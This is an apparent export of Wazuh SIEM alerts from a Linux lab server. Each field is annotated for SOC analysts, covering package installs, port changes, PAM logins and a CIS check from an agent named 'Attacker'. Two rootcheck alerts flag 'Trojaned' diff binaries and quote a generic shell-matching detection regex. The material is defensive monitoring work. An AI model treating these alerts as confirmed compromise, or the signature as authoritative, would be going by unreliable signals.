_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:38.296+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:38.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533418.31210
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:37 status installed linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:38.296+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:38.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533418.31711
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:37 status half-configured linux-modules-extra-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-modules-extra-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Host-based anomaly detection event (rootcheck).

🧠 What happened? Host-based anomaly detection event (rootcheck).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:29:41.101+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:41.101+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Host-based anomaly detection event (rootcheck).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  510
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec', 'rootcheck']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533781.32242
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  Trojaned version of file '/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic).
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  rootcheck
Name of the Wazuh decoder that parsed this raw log.

data.title:  Trojaned version of file detected.
Short title some decoders add – usually informational.

data.file:  /bin/diff
Generic file path referenced in the log.

location:  rootcheck
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Host-based anomaly detection event (rootcheck).

🧠 What happened? Host-based anomaly detection event (rootcheck).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:29:41.132+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:41.132+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Host-based anomaly detection event (rootcheck).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  510
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec', 'rootcheck']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533781.32617
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  Trojaned version of file '/usr/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic).
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  rootcheck
Name of the Wazuh decoder that parsed this raw log.

data.title:  Trojaned version of file detected.
Short title some decoders add – usually informational.

data.file:  /usr/bin/diff
Generic file path referenced in the log.

location:  rootcheck
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Listened ports status (netstat) changed (new port opened or closed).

🧠 What happened? Listened ports status (netstat) changed (new port opened or closed).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:29:43.646+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:43.646+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Listened ports status (netstat) changed (new port opened or closed).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  533
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
GPG13 (UK Good Practice Guide 13) protective‑monitoring control the rule maps to – a compliance tag, not an indicator.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533783.33000
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

previous_output:  Previous output: ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/systemd tcp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv tcp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 192.168.6.137:68 0.0.0.0:* 4024/systemd-networ tcp 0.0.0.0:443 0.0.0.0:* 62808/node tcp 0.0.0.0:1514 0.0.0.0:* 60647/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 60521/wazuh-authd tcp6 127.0.0.1:9200 :::* 16883/java tcp6 127.0.0.1:9300 :::* 16883/java tcp 0.0.0.0:55000 0.0.0.0:* 60481/python3
The netstat snapshot from the previous run – diff it against full_log to see exactly which listener changed. Here the java listeners on 127.0.0.1:9200 and 127.0.0.1:9300 from the previous run are gone, and every remaining PID is different (PID 1 now reports as init), which points to a host restart rather than a single new service.

full_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/init tcp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve tcp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 192.168.6.137:68 0.0.0.0:* 710/systemd-network tcp 0.0.0.0:443 0.0.0.0:* 908/node tcp 0.0.0.0:1514 0.0.0.0:* 1711/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 1626/wazuh-authd tcp 0.0.0.0:55000 0.0.0.0:* 1578/python3
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

previous_log:  ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/systemd tcp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv tcp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.53:53 0.0.0.0:* 4398/systemd-resolv udp 127.0.0.54:53 0.0.0.0:* 4398/systemd-resolv udp 192.168.6.137:68 0.0.0.0:* 4024/systemd-networ tcp 0.0.0.0:443 0.0.0.0:* 62808/node tcp 0.0.0.0:1514 0.0.0.0:* 60647/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 60521/wazuh-authd tcp6 127.0.0.1:9200 :::* 16883/java tcp6 127.0.0.1:9300 :::* 16883/java tcp 0.0.0.0:55000 0.0.0.0:* 60481/python3
Same previous snapshot as previous_output, kept as the raw line for diffing.

location:  netstat listening ports
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM misconfiguration.

🧠 What happened? PAM misconfiguration.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:29:45.510+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:45.510+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM misconfiguration.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5553
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.3']
GPG13 (UK Good Practice Guide 13) protective‑monitoring control the rule maps to – a compliance tag, not an indicator.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533785.34367
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:29:45.348195+00:00 server1 login[1202]: PAM unable to dlopen(pam_lastlog.so): /usr/lib/security/pam_lastlog.so: cannot open shared object file: No such file or directory
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  login
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:29:45.348195+00:00
Timestamp parsed out of the raw log line itself. Compare it with the top‑level timestamp: a large gap means delayed collection, not a live event.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Wazuh server started.

🧠 What happened? Wazuh server started.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:29:52.672+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:52.672+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Wazuh server started.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  502
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
GPG13 (UK Good Practice Guide 13) protective‑monitoring control the rule maps to – a compliance tag, not an indicator.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533792.34782
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  ossec: Manager started.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

location:  wazuh-monitord
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:29:53.531+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:53.531+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
GPG13 (UK Good Practice Guide 13) protective‑monitoring control the rule maps to – a compliance tag, not an indicator.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533793.35029
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:29:53.449652+00:00 server1 login[1202]: pam_unix(login:session): session opened for user simba(uid=1000) by simba(uid=0)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  login
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:29:53.449652+00:00
Timestamp parsed out of the raw log line itself. Compare it with the top‑level timestamp: a large gap means delayed collection, not a live event.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  simba(uid=1000)
Target account of the session as PAM reports it (name plus uid); data.srcuser and data.uid are the account and uid of the process that opened it.

data.uid:  0
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:29:55.530+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:29:55.530+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
GPG13 (UK Good Practice Guide 13) protective‑monitoring control the rule maps to – a compliance tag, not an indicator.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533795.35488
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:29:53.669158+00:00 server1 (systemd): pam_unix(systemd-user:session): session opened for user simba(uid=1000) by simba(uid=0)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  (systemd)
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:29:53.669158+00:00
Timestamp parsed out of the raw log line itself. Compare it with the top‑level timestamp: a large gap means delayed collection, not a live event.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  simba(uid=1000)
Target account of the session as PAM reports it (name plus uid); data.srcuser and data.uid are the account and uid of the process that opened it.

data.uid:  0
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:19.981+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:19.981+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
CIS Critical Security Controls mapping – a compliance tag, not an indicator.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533879.35952
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26000
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Enforce password history' is set to '24 or more password(s)'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

